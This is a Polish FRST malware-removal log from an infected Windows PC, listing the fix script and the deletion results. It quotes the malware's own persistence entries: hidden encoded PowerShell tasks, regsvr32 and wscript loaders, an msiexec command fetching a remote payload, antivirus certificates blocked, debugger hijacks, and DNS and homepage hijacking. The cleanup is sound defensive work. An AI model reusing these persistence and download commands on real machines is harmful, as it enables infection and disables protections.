Rezultat naprawy Farbar Recovery Scan Tool (x64) Wersja: 21.01.2018 Uruchomiony przez administratorka (24-01-2018 15:24:59) Run:1 Uruchomiony z C:\Users\administratorka\Desktop Załadowane profile: administratorka (Dostępne profile: administratorka) Tryb startu: Normal ============================================== fixlist - zawartość: ***************** CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-478647955-3472351390-1182581596-1000\...\ChromeHTML: -> C:\Program Files (x86)\Cupduck\Application\chrome.exe (Google Inc.) <==== UWAGA C:\Program Files (x86)\Cupduck C:\Users\administratorka\AppData\Local\Cupduck C:\Users\administratorka\AppData\Roaming\Cupduck C:\Program Files (x86)\Firefox C:\Users\administratorka\AppData\Local\Firefox C:\Users\administratorka\AppData\Roaming\Firefox R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [116376 2017-05-23] () <==== UWAGA DeleteKey: HKCU\Software\Cupduck DeleteKey: HKLM\SOFTWARE\WOW6432Node\Cupduck DeleteKey: HKCU\Software\Firefox DeleteKey: HKLM\SOFTWARE\WOW6432Node\Firefox CustomCLSID: HKU\S-1-5-21-478647955-3472351390-1182581596-1000_Classes\CLSID\{590C4387-5EBD-4D46-8A84-CD0BA2EF2856}\InprocServer32 -> C:\Users\administratorka\AppData\Local\Google\Update\1.3.30.3\psuser_64.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-478647955-3472351390-1182581596-1000_Classes\CLSID\{59B55F04-DE14-4BB8-92FF-C4A22EF2E5F4}\InprocServer32 -> C:\Users\administratorka\AppData\Local\Google\Update\1.3.31.5\psuser_64.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-478647955-3472351390-1182581596-1000_Classes\CLSID\{793EE463-1304-471C-ADF1-68C2FFB01247}\InprocServer32 -> C:\Users\administratorka\AppData\Local\Google\Update\1.3.29.5\psuser_64.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-478647955-3472351390-1182581596-1000_Classes\CLSID\{8C46158B-D978-483C-A312-16EE5013BE04}\InprocServer32 -> C:\Users\administratorka\AppData\Local\Google\Update\1.3.33.3\psuser_64.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-478647955-3472351390-1182581596-1000_Classes\CLSID\{CB492AF1-2CEF-4E58-BE47-471C77D0C8BA}\InprocServer32 -> C:\Users\administratorka\AppData\Local\Google\Update\1.3.32.7\psuser_64.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-478647955-3472351390-1182581596-1000_Classes\CLSID\{E68D0A55-3C40-4712-B90D-DCFA93FF2534}\InprocServer32 -> C:\Users\administratorka\AppData\Roaming\GG\ggdrive\ggdrive-menu.dll => Brak pliku ContextMenuHandlers1_S-1-5-21-478647955-3472351390-1182581596-1000: [GGDriveMenu] -> {E68D0A55-3C40-4712-B90D-DCFA93FF2534} => C:\Users\administratorka\AppData\Roaming\GG\ggdrive\ggdrive-menu.dll -> Brak pliku ContextMenuHandlers4_S-1-5-21-478647955-3472351390-1182581596-1000: [GGDriveMenu] -> {E68D0A55-3C40-4712-B90D-DCFA93FF2534} => C:\Users\administratorka\AppData\Roaming\GG\ggdrive\ggdrive-menu.dll -> Brak pliku ContextMenuHandlers5_S-1-5-21-478647955-3472351390-1182581596-1000: [GGDriveMenu] -> {E68D0A55-3C40-4712-B90D-DCFA93FF2534} => C:\Users\administratorka\AppData\Roaming\GG\ggdrive\ggdrive-menu.dll -> Brak pliku Task: {32396D88-557C-4C4E-9B26-025EDAA48549} - \PowerWord-SCT-JT -> Brak pliku <==== UWAGA Task: {78DD82B5-91E5-44CD-92AD-5D158744913E} - \Windows-WoShiBeiYongDe -> Brak pliku <==== UWAGA Task: {58483EE7-A7F3-41C5-AD0E-22B2E1469AC7} - System32\Tasks\82F37914-A36A-6A79-9CCE-BAC5980BBB44 => C:\Windows\SysWOW64\regsvr32.exe /n /s /i:"/1190cf1e9d8bccd9 /q" "C:\Users\ADMINI~1\AppData\Local\78EB64~1\{65C50~1." Task: {CD5D4BB2-AF26-4D25-9B2E-D36BB41D916F} - System32\Tasks\{F55353F7-257A-4BE2-CE80-ED3F1C1ADC3E} => C:\Windows\system32\regsvr32.exe /s /n /i:"/rt" "C:\Users\ADMINI~1\AppData\Local\78EB64~1\65c50efb.dll" <==== UWAGA Task: {6F6305AB-354E-4BB0-8D8D-0AE54BB8D1F0} - System32\Tasks\{838FBDD6-4401-4BFC-8DBC-80C9694AD4AE} => C:\Windows\system32\pcalua.exe -a C:\Users\ADMINI~1\AppData\Local\Temp\lui1CF5.tmp\setup.exe -d C:\Users\ADMINI~1\AppData\Local\Temp\Rar$EXa0.977 <==== UWAGA Task: {82F5D2D1-674E-40C6-972E-CCADEED6C20A} - System32\Tasks\English To Chaser => C:\Windows\system32\rundll32.exe "C:\Program Files\English To Chaser\English To Chaser.dll",LOBbcwq <==== UWAGA Task: {C7E8A21F-1FAA-410A-BC72-8DFF12E1A01B} - System32\Tasks\Chromium lotas => "wscript.exe" "C:\ProgramData\{1C91D9F2-96D3-5334-1015-CD768A5746B8}\dodi.txt" "68747470733a2f2f6b6174756e61712e636f6d" "433a5c50726f6772616d446174615c7b31433931443946322d393644332d353333342d313031352d4344373638413537343642387d5c6d6973617361" "433a5c50726f6772616d446174615c7b31433931443946322d393644332d353333342d (dane wartości zawierają 84 znaków więcej). <==== UWAGA Task: {E9BDE757-84E7-4207-9089-B095B2313ECD} - System32\Tasks\{09097A47-090F-7A0F-0B11-0E090B7D1108} => C:\Windows\system32\WindowsPowershell\v1.0\powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand IAAgACAAOwA7ACAAIAA7ADsAOwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAHMAdABvAHAAIgA7ACQAcwBjAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAkAFcAYQByAG4AaQBuAGcAUAByAGUAZgBlAHIAZQBuAGMA (dane wartości zawierają 9568 znaków więcej). <==== UWAGA C:\Users\ADMINI~1\AppData\Local\78EB64~1 C:\Program Files\English To Chaser HKLM\...\RunOnce: [KOMPUTER01] => C:\Windows\TEMP\gC560.tmp.exe [209408 2018-01-24] () <==== UWAGA HKLM\ DisallowedCertificates: 03D22C9C66915D58C88912B64C1F984B8344EF09 (Comodo Security Solutions) <==== UWAGA HKLM\ DisallowedCertificates: 0F684EC1163281085C6AF20528878103ACEFCAAB (F-Secure Corporation) <==== UWAGA HKLM\ DisallowedCertificates: 1667908C9E22EFBD0590E088715CC74BE4C60884 (FRISK Software International/F-Prot) <==== UWAGA HKLM\ DisallowedCertificates: 18DEA4EFA93B06AE997D234411F3FD72A677EECE (Bitdefender SRL) <==== UWAGA HKLM\ DisallowedCertificates: 2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF (G DATA Software AG) <==== UWAGA HKLM\ DisallowedCertificates: 249BDA38A611CD746A132FA2AF995A2D3C941264 (Malwarebytes Corporation) <==== UWAGA HKLM\ DisallowedCertificates: 31AC96A6C17C425222C46D55C3CCA6BA12E54DAF (Symantec Corporation) <==== UWAGA HKLM\ DisallowedCertificates: 331E2046A1CCA7BFEF766724394BE6112B4CA3F7 (Trend Micro) <==== UWAGA HKLM\ DisallowedCertificates: 3353EA609334A9F23A701B9159E30CB6C22D4C59 (Webroot Inc.) <==== UWAGA HKLM\ DisallowedCertificates: 373C33726722D3A5D1EDD1F1585D5D25B39BEA1A (SUPERAntiSpyware.com) <==== UWAGA HKLM\ DisallowedCertificates: 3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F (Kaspersky Lab) <==== UWAGA HKLM\ DisallowedCertificates: 3D496FA682E65FC122351EC29B55AB94F3BB03FC (AVG Technologies CZ) <==== UWAGA HKLM\ DisallowedCertificates: 4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 (PC Tools) <==== UWAGA HKLM\ DisallowedCertificates: 42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 (K7 Computing Pvt Ltd) <==== UWAGA HKLM\ DisallowedCertificates: 4420C99742DF11DD0795BC15B7B0ABF090DC84DF (Doctor Web Ltd.) <==== UWAGA HKLM\ DisallowedCertificates: 4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF (Emsisoft Ltd) <==== UWAGA HKLM\ DisallowedCertificates: 5240AB5B05D11B37900AC7712A3C6AE42F377C8C (Check Point Software Technologies Ltd.) <==== UWAGA HKLM\ DisallowedCertificates: 5DD3D41810F28B2A13E9A004E6412061E28FA48D (Emsisoft Ltd) <==== UWAGA HKLM\ DisallowedCertificates: 7457A3793086DBB58B3858D6476889E3311E550E (K7 Computing Pvt Ltd) <==== UWAGA HKLM\ DisallowedCertificates: 76A9295EF4343E12DFC5FE05DC57227C1AB00D29 (BullGuard Ltd) <==== UWAGA HKLM\ DisallowedCertificates: 775B373B33B9D15B58BC02B184704332B97C3CAF (McAfee) <==== UWAGA HKLM\ DisallowedCertificates: 872CD334B7E7B3C3D1C6114CD6B221026D505EAB (Comodo Security Solutions) <==== UWAGA HKLM\ DisallowedCertificates: 88AD5DFE24126872B33175D1778687B642323ACF (McAfee) <==== UWAGA HKLM\ DisallowedCertificates: 9132E8B079D080E01D52631690BE18EBC2347C1E (Adaware Software) <==== UWAGA HKLM\ DisallowedCertificates: 982D98951CF3C0CA2A02814D474A976CBFF6BDB1 (Safer Networking Ltd.) <==== UWAGA HKLM\ DisallowedCertificates: 9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 (Webroot Inc.) <==== UWAGA HKLM\ DisallowedCertificates: 9C43F665E690AB4D486D4717B456C5554D4BCEB5 (ThreatTrack Security) <==== UWAGA HKLM\ DisallowedCertificates: 9E3F95577B37C74CA2F70C1E1859E798B7FC6B13 (CURIOLAB S.M.B.A.) <==== UWAGA HKLM\ DisallowedCertificates: A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 (Avira Operations GmbH & Co. KG) <==== UWAGA HKLM\ DisallowedCertificates: A5341949ABE1407DD7BF7DFE75460D9608FBC309 (BullGuard Ltd) <==== UWAGA HKLM\ DisallowedCertificates: A59CC32724DD07A6FC33F7806945481A2D13CA2F (ESET) <==== UWAGA HKLM\ DisallowedCertificates: AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 (AVG Technologies CZ) <==== UWAGA HKLM\ DisallowedCertificates: AD4C5429E10F4FF6C01840C20ABA344D7401209F (Avast Antivirus/Software) <==== UWAGA HKLM\ DisallowedCertificates: AD96BB64BA36379D2E354660780C2067B81DA2E0 (Symantec Corporation) <==== UWAGA HKLM\ DisallowedCertificates: B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 (Malwarebytes Corporation) <==== UWAGA HKLM\ DisallowedCertificates: CDC37C22FE9272D8F2610206AD397A45040326B8 (Trend Micro) <==== UWAGA HKLM\ DisallowedCertificates: D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 (Kaspersky Lab) <==== UWAGA HKLM\ DisallowedCertificates: DB303C9B61282DE525DC754A535CA2D6A9BD3D87 (ThreatTrack Security) <==== UWAGA HKLM\ DisallowedCertificates: DB77E5CFEC34459146748B667C97B185619251BA (Avast Antivirus/Software) <==== UWAGA HKLM\ DisallowedCertificates: E22240E837B52E691C71DF248F12D27F96441C00 (Total Defense, Inc.) <==== UWAGA HKLM\ DisallowedCertificates: E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF (AVG Technologies CZ) <==== UWAGA HKLM\ DisallowedCertificates: ED841A61C0F76025598421BC1B00E24189E68D54 (Bitdefender SRL) <==== UWAGA HKLM\ DisallowedCertificates: F83099622B4A9F72CB5081F742164AD1B8D048C9 (ESET) <==== UWAGA HKLM\ DisallowedCertificates: FBB42F089AF2D570F2BF6F493D107A3255A9BB1A (Panda Security S.L) <==== UWAGA HKLM\ DisallowedCertificates: FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 (Doctor Web Ltd.) <==== UWAGA HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ograniczenia <==== UWAGA HKU\S-1-5-21-478647955-3472351390-1182581596-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.orangeiloveyou.com/?data=zDlkMj1LNTU4MdhWFdRYFTM8FjF2MYZQNjQLOYI5MUFyFkM8RF== /q <==== UWAGA HKU\S-1-5-18\Control Panel\Desktop\\SCRNSAVE.EXE -> IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe IFEO\taskmgr.exe: [Debugger] GroupPolicy: Ograniczenia <==== UWAGA Tcpip\Parameters: [NameServer] 82.163.143.176 82.163.142.178 Tcpip\..\Interfaces\{8EF21497-7361-4F1C-A09C-A9A671FA6743}: [NameServer] 82.163.143.176 82.163.142.178 Toolbar: HKU\S-1-5-21-478647955-3472351390-1182581596-1000 -> Brak nazwy - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - Brak pliku HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.mylucky123.com/?type=hp&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.mylucky123.com/?type=hp&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.mylucky123.com/search/?type=ds&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.mylucky123.com/search/?type=ds&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.mylucky123.com/?type=hp&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.mylucky123.com/?type=hp&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.mylucky123.com/search/?type=ds&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.mylucky123.com/search/?type=ds&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB&q={searchTerms} HKU\S-1-5-21-478647955-3472351390-1182581596-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.mylucky123.com/?type=hp&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB HKU\S-1-5-21-478647955-3472351390-1182581596-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.mylucky123.com/?type=hp&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.mylucky123.com/search/?type=ds&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB&q={searchTerms} SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.mylucky123.com/search/?type=ds&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB&q={searchTerms} SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.mylucky123.com/search/?type=ds&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB&q={searchTerms} SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.mylucky123.com/search/?type=ds&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB&q={searchTerms} SearchScopes: HKU\S-1-5-21-478647955-3472351390-1182581596-1000 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.mylucky123.com/search/?type=ds&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB&q={searchTerms} CHR HomePage: Default -> hxxp://www.mylucky123.com/?type=hp&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB FF Plugin: @microsoft.com/GENUINE -> disabled [Brak pliku] FF Plugin-x32: @microsoft.com/GENUINE -> disabled [Brak pliku] R2 WinCacheSrv; C:\ProgramData\Package Cache\{E01CB7F1-3E88-4450-1764-B3CC1E205C4A}v10.1.14393.795\Installers\30daf459e79c5d26366654b1b482e87.cab:dp [205826 ] () [Brak podpisu cyfrowego] <==== UWAGA C:\ProgramData\Package Cache\{E01CB7F1-3E88-4450-1764-B3CC1E205C4A}v10.1.14393.795\Installers\30daf459e79c5d26366654b1b482e87.cab:dp S2 CornerSunshineSvc; "C:\Program Files (x86)\Corner Sunshine\CornerSunshineSvc.exe" {8A712DBD-E08B-4D5C-839D-1B9C185FE769} [X] 2018-01-24 11:05 - 2016-10-21 14:12 - 000000000 _____ C:\Users\Public\Documents\report.dat 2018-01-24 11:03 - 2016-09-29 09:51 - 000001195 _____ C:\Users\Public\Documents\temp.dat 2018-01-19 13:55 - 2016-10-21 14:12 - 000000000 ____D C:\ProgramData\fjcfi 2018-01-19 13:55 - 2016-10-21 13:44 - 000000000 ____D C:\ProgramData\chuvc 2017-12-27 19:59 - 2017-12-29 20:59 - 000000068 _____ () C:\Users\administratorka\AppData\Local\YdozKPUZep C:\Users\administratorka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Picasa 3.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DriverDoc\DriverDoc.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DriverDoc\Register DriverDoc.lnk C:\Users\administratorka\Desktop\Google Chrome.lnk C:\Users\administratorka\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk C:\Users\administratorka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Users\administratorka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk C:\Users\administratorka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk C:\Users\administratorka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Mozilla Firefox.lnk C:\Users\administratorka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Mozilla Firefox.lnk C:\Users\administratorka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Mozilla Firefox (2).lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk C:\Users\Public\Desktop\Mozilla Firefox.lnk C:\Users\administratorka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\BigFarm.lnk C:\Users\administratorka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\big_bang_empire.lnk ShortcutWithArgument: C:\Users\administratorka\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.mylucky123.com/?type=sc&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\theHunter\theHunter.lnk -> D:\theHunter\launcher\launcher.exe (Expansive Worlds) -> hxxp://www.mylucky123.com/?type=sc&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox\Mozilla Firefox (Safe Mode).lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.mylucky123.com/?type=sc&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.mylucky123.com/?type=sc&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB CMD: dir /a "C:\Program Files" CMD: dir /a "C:\Program Files (x86)" CMD: dir /a "C:\Program Files\Common Files\System" CMD: dir /a "C:\Program Files (x86)\Common Files\System" CMD: dir /a C:\ProgramData CMD: dir /a C:\Users\administratorka\AppData\Local CMD: dir /a C:\Users\administratorka\AppData\LocalLow CMD: dir /a C:\Users\administratorkaAppData\Roaming CMD: netsh advfirewall reset CMD: ipconfig /flushdns Hosts: Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"} EmptyTemp: ***************** Procesy zostały pomyślnie zamknięte. Punkt przywracania został pomyślnie utworzony. "HKU\S-1-5-21-478647955-3472351390-1182581596-1000_Classes\ChromeHTML" => pomyślnie usunięto C:\Program Files (x86)\Cupduck => pomyślnie przeniesiono C:\Users\administratorka\AppData\Local\Cupduck => pomyślnie przeniesiono "C:\Users\administratorka\AppData\Roaming\Cupduck" => nie znaleziono C:\Program Files (x86)\Firefox => pomyślnie przeniesiono C:\Users\administratorka\AppData\Local\Firefox => pomyślnie przeniesiono C:\Users\administratorka\AppData\Roaming\Firefox => pomyślnie przeniesiono "HKLM\System\CurrentControlSet\Services\FirefoxU" => pomyślnie usunięto FirefoxU => serwis pomyślnie usunięto "HKCU\Software\Cupduck" => pomyślnie usunięto "HKLM\SOFTWARE\WOW6432Node\Cupduck" => pomyślnie usunięto "HKCU\Software\Firefox" => pomyślnie usunięto "HKLM\SOFTWARE\WOW6432Node\Firefox" => pomyślnie usunięto "HKU\S-1-5-21-478647955-3472351390-1182581596-1000_Classes\CLSID\{590C4387-5EBD-4D46-8A84-CD0BA2EF2856}" => pomyślnie usunięto "HKU\S-1-5-21-478647955-3472351390-1182581596-1000_Classes\CLSID\{59B55F04-DE14-4BB8-92FF-C4A22EF2E5F4}" => pomyślnie usunięto "HKU\S-1-5-21-478647955-3472351390-1182581596-1000_Classes\CLSID\{793EE463-1304-471C-ADF1-68C2FFB01247}" => pomyślnie usunięto "HKU\S-1-5-21-478647955-3472351390-1182581596-1000_Classes\CLSID\{8C46158B-D978-483C-A312-16EE5013BE04}" => pomyślnie usunięto "HKU\S-1-5-21-478647955-3472351390-1182581596-1000_Classes\CLSID\{CB492AF1-2CEF-4E58-BE47-471C77D0C8BA}" => pomyślnie usunięto "HKU\S-1-5-21-478647955-3472351390-1182581596-1000_Classes\CLSID\{E68D0A55-3C40-4712-B90D-DCFA93FF2534}" => pomyślnie usunięto "HKU\S-1-5-21-478647955-3472351390-1182581596-1000\Software\Classes\*\ShellEx\ContextMenuHandlers\GGDriveMenu" => pomyślnie usunięto HKU\S-1-5-21-478647955-3472351390-1182581596-1000\SOFTWARE\Classes\CLSID\{E68D0A55-3C40-4712-B90D-DCFA93FF2534} => klucz nie znaleziono "HKU\S-1-5-21-478647955-3472351390-1182581596-1000\Software\Classes\Directory\ShellEx\ContextMenuHandlers\GGDriveMenu" => pomyślnie usunięto HKU\S-1-5-21-478647955-3472351390-1182581596-1000\SOFTWARE\Classes\CLSID\{E68D0A55-3C40-4712-B90D-DCFA93FF2534} => klucz nie znaleziono "HKU\S-1-5-21-478647955-3472351390-1182581596-1000\Software\Classes\Directory\Background\ShellEx\ContextMenuHandlers\GGDriveMenu" => pomyślnie usunięto HKU\S-1-5-21-478647955-3472351390-1182581596-1000\SOFTWARE\Classes\CLSID\{E68D0A55-3C40-4712-B90D-DCFA93FF2534} => klucz nie znaleziono HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{32396D88-557C-4C4E-9B26-025EDAA48549} => niepowodzenie przy usuwaniu klucz. ErrorCode1: 0x00000002 "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{32396D88-557C-4C4E-9B26-025EDAA48549}" => pomyślnie usunięto "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\PowerWord-SCT-JT" => pomyślnie usunięto "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{78DD82B5-91E5-44CD-92AD-5D158744913E}" => pomyślnie usunięto "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{78DD82B5-91E5-44CD-92AD-5D158744913E}" => pomyślnie usunięto "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Windows-WoShiBeiYongDe" => pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{58483EE7-A7F3-41C5-AD0E-22B2E1469AC7} => klucz nie znaleziono C:\Windows\System32\Tasks\82F37914-A36A-6A79-9CCE-BAC5980BBB44 => pomyślnie przeniesiono "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\82F37914-A36A-6A79-9CCE-BAC5980BBB44" => pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CD5D4BB2-AF26-4D25-9B2E-D36BB41D916F} => klucz nie znaleziono C:\Windows\System32\Tasks\{F55353F7-257A-4BE2-CE80-ED3F1C1ADC3E} => pomyślnie przeniesiono "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{F55353F7-257A-4BE2-CE80-ED3F1C1ADC3E}" => pomyślnie usunięto "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{6F6305AB-354E-4BB0-8D8D-0AE54BB8D1F0}" => pomyślnie usunięto "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6F6305AB-354E-4BB0-8D8D-0AE54BB8D1F0}" => pomyślnie usunięto C:\Windows\System32\Tasks\{838FBDD6-4401-4BFC-8DBC-80C9694AD4AE} => pomyślnie przeniesiono "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{838FBDD6-4401-4BFC-8DBC-80C9694AD4AE}" => pomyślnie usunięto "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{82F5D2D1-674E-40C6-972E-CCADEED6C20A}" => pomyślnie usunięto "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{82F5D2D1-674E-40C6-972E-CCADEED6C20A}" => pomyślnie usunięto C:\Windows\System32\Tasks\English To Chaser => pomyślnie przeniesiono "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\English To Chaser" => pomyślnie usunięto "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C7E8A21F-1FAA-410A-BC72-8DFF12E1A01B}" => pomyślnie usunięto "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C7E8A21F-1FAA-410A-BC72-8DFF12E1A01B}" => pomyślnie usunięto C:\Windows\System32\Tasks\Chromium lotas => pomyślnie przeniesiono "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Chromium lotas" => pomyślnie usunięto 